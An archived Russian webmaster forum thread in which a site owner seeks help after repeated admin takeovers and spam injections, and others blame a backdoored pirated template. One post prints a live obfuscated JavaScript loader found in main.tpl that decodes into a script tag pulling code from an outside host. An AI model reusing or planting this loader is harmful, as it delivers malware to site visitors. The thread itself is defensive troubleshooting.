sanya pro 0 Опубликовано: 16 марта 2010 Рассказать Опубликовано: 16 марта 2010 Недавно обновился до 8.5 версии движка, сменил дизайн сайта, переделывал шаблон сайта сам. И после этих действий: Кто-то (или что-то) постоянно взламывает пароль администратора, меняет, редактирует профиль и пароль администратора, добавляют новости на сайт типа: "Наш новый сайт и там ссылка на сайт" вставляют рекламу, сегодня заметил что удалили комментарии и т.д. (уже 4-й день подряд, только восстановлю пароль, через некоторое время это приходится делать снова...) Как защитится от злоумышленников ...? Как выявить и устранить эту дыру? Может кто что-то посоветовать, подсказать, а то уже нет сил? Сайт grand-tv.com (лицензия) - пароль от фтп не храню (постоянно ввожу) Заранее спасибо! Ссылка на сообщение Поделиться на других сайтах
maclay 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 А мыло твое не ломали? Моет тоже восстанавливает на твое мыло?)) Ссылка на сообщение Поделиться на других сайтах
ArtemNY 17 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Недавно обновился до 8.5 версии движка, сменил дизайн сайта, переделывал шаблон сайта сам. И после этих действий: Кто-то (или что-то) постоянно взламывает пароль администратора, меняет, редактирует профиль и пароль администратора, добавляют новости на сайт типа: "Наш новый сайт и там ссылка на сайт" вставляют рекламу, сегодня заметил что удалили комментарии и т.д. (уже 4-й день подряд, только восстановлю пароль, через некоторое время это приходится делать снова...) Как защитится от злоумышленников ...? Как выявить и устранить эту дыру? Может кто что-то посоветовать, подсказать, а то уже нет сил? Сайт grand-tv.com (лицензия) - пароль от фтп не храню (постоянно ввожу) Заранее спасибо! Думаю если нет никаких левых модов и скриптов типа попандеров и прочей х-ни, то дело только в ыМейле... Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Автор Думаю если нет никаких левых модов и скриптов типа попандеров и прочей х-ни, то дело только в ыМейле... Сменил мыло, и пароли: к фтп, почте, админпанели на долго ли..? По поводу модов, стоит карта сайта, модуль переходи, и pingationMod - все куплены у авторов! (модули стояли раньше) По поводу скриптов типа попандеров и прочей х-ни, заметил вчера влепили попандер, ну и от меня стоит блок бодиклика До обновления движка и смены шаблона все было хорошо! Думаю в шаблоне собака зарыта (в каком нибудь .js - в этом не разбираюсь, только сss и html) может обновить движок и сменить шаблон??? Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 До обновления движка и смены шаблона все было хорошо! сомнительный источник шаблона, прямой путь к взлому сайта, шаблон нужно однозначно убирать, заказывайте себе либо персональный, либо скачивайте из надежных источников. Времена когда можно было скачать нормальный рип или нулл уже давно прошли, сейчас в каждом нулле понатыканы бэкдоры, а в каждом рипе трояны и что еще хуже те же бекдоры. Например файл шаблона login.tpl, может перехватывать вводимый пароль и отсылать злоумышленникам. Ссылка на сообщение Поделиться на других сайтах
Mek 99 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 celsoft, есть ли какой онлайн сервис для проверки всего сайта целиком, или же отдельно файлов .php и .tpl на наличие вредоносного кода, троянов и бекдоров ? Ссылка на сообщение Поделиться на других сайтах
celsoft 6230 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek, мне такие неизвестны Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek у меня Kaspersky Internet Security палит все ифреймы, шеллы.. Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Mek у меня Kaspersky Internet Security палит все ифреймы, шеллы.. Он полностью сканирует весь сайт? Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Делаю дамп файлов на комп и сканирую Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 iFrame может быть прописан в базу данных и выводиться в новостях. И ты базу данных тоже выкачиваешь и проверяешь так? Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 17 марта 2010 Рассказать Опубликовано: 17 марта 2010 Автор До обновления движка и смены шаблона все было хорошо! сомнительный источник шаблона, прямой путь к взлому сайта, шаблон нужно однозначно убирать, заказывайте себе либо персональный, либо скачивайте из надежных источников. Времена когда можно было скачать нормальный рип или нулл уже давно прошли, сейчас в каждом нулле понатыканы бэкдоры, а в каждом рипе трояны и что еще хуже те же бекдоры. Например файл шаблона login.tpl, может перехватывать вводимый пароль и отсылать злоумышленникам. Спасибо за отклик. Буду менять шаблон или закажу новый (на 90% уверен, что дело в шаблоне) Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 Автор Вот заметил такой код вылазит перед <head>, в каком же файле его искать (чтобы снести), может он и есть причиной взлома паролей??? <script type="text/javascript" language="javascript"> <!-- function tdy794(jD103){document.write( String.fromCharCode(parseInt(jD103)-5));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var A682="109D121D121D117D63D52D52D103D113D102D122D"+ "127D127D106D119D51D116D112D116D120D109D106D104D109D"+ "112D102D51D115D106D121D52D120D52D104D119D127D118D58D"+ "54D58D57D52D68D120D110D105D66D54D53D54D62D53D61";var RP795=A682.split("D"); for(go690=0;go690<RP795.length;go690++){tdy794(RP795[go690]);} document.write("'></sc"+"ript>"); // --> </script> заранее спасибо, за понимание! Ссылка на сообщение Поделиться на других сайтах
kpravda 102 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 index.php /templates/название шаблона/main.tpl init.php Ссылка на сообщение Поделиться на других сайтах
sanya pro 0 Опубликовано: 18 марта 2010 Рассказать Опубликовано: 18 марта 2010 Автор В этих файлах нет кода: index.php init.php Но он появляется в main.tpl , через определенный промежуток времени даже когда я его удаляю. ну прям чудеса... такое впечатление, что есть скрытый админ и он постоянно редактирует мой профиль, то почту меняет то логин, пароль само собой, восстанавливать свои данные приходится через phpmyadmin, но это не на долго... Ссылка на сообщение Поделиться на других сайтах
Nektov 60 Опубликовано: 19 марта 2010 Рассказать Опубликовано: 19 марта 2010 Посмотрите логи сервера. Там толжно быть прописано что их (строки скрипта) повторно вставляет. Для проверки файлов шаблона и сайта советую http://www.virustotal.com/ru/ Весь сайт можно проверить здесь: http://safeweb.norton.com/report/show?url=site.ru http://www.siteadvisor.com/sites/site.ru Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1161 Опубликовано: 19 марта 2010 Рассказать Опубликовано: 19 марта 2010 Nektov, спасибо за ссылки, полезные фичи для вебмастера Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Архивировано
Эта тема находится в архиве и закрыта для публикации сообщений.